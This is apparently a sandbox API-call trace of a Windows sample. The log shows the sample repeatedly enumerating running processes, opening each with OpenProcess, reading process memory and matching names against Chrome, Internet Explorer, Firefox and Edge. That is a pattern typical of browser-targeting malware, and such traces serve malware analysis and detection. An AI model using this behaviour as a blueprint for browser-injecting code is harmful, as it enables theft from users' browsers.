	[0220.554] ReadProcessMemory (in: hProcess=0x4e34, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0220.554] ReadProcessMemory (in: hProcess=0x4e34, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0220.554] ReadProcessMemory (in: hProcess=0x4e34, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0220.554] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0220.554] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0220.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4e38
	[0220.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.555] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0220.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.555] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.556] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0220.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.556] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.556] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0220.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4e3c
	[0220.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.557] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0220.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.557] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.558] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0220.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.558] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.558] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4e40
	[0220.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.559] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.559] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.560] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.560] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.560] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.561] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4e44
	[0220.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.562] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.562] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.562] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.563] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.563] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0220.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4e48
	[0220.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.564] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.564] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.564] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.565] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.565] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4e4c
	[0220.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.566] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.566] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.566] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.567] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.567] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0220.568] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x4e50
	[0220.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.568] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0220.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.568] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.568] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0220.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.569] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.570] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0220.570] CloseHandle (hObject=0x188) returned 1
	[0220.570] Sleep (dwMilliseconds=0x64) 
	[0220.679] GetCurrentProcessId () returned 0x110
	[0220.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0220.683] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0220.684] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0220.685] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0220.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4e54
	[0220.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.687] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.687] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.688] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.689] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.689] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0220.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4e58
	[0220.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.691] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.691] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.692] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.692] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0220.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4e5c
	[0220.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.694] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0220.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.694] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.694] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0220.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.695] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.695] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0220.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4e60
	[0220.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.696] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.696] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.696] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.697] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.697] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0220.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4e64
	[0220.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.698] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0220.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.698] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.698] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0220.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.698] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.699] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0220.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4e68
	[0220.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.700] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0220.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.700] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.700] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0220.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.701] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.701] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0220.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4e6c
	[0220.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.702] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0220.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.702] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.702] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0220.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.702] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.703] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0220.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4e70
	[0220.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.703] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0220.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.704] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.704] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0220.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.704] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.704] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4e74
	[0220.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.705] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.705] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.706] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.706] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.706] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4e78
	[0220.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.707] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.707] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.708] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.708] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.708] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4e7c
	[0220.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.709] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.710] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.710] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.711] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4e80
	[0220.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.712] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.712] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.712] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.713] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4e84
	[0220.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.714] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.714] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.714] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.715] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4e88
	[0220.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.716] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.716] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.716] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.716] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4e8c
	[0220.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.717] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.718] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.718] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.718] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.719] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0220.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4e90
	[0220.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.719] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0220.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.720] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.720] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0220.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
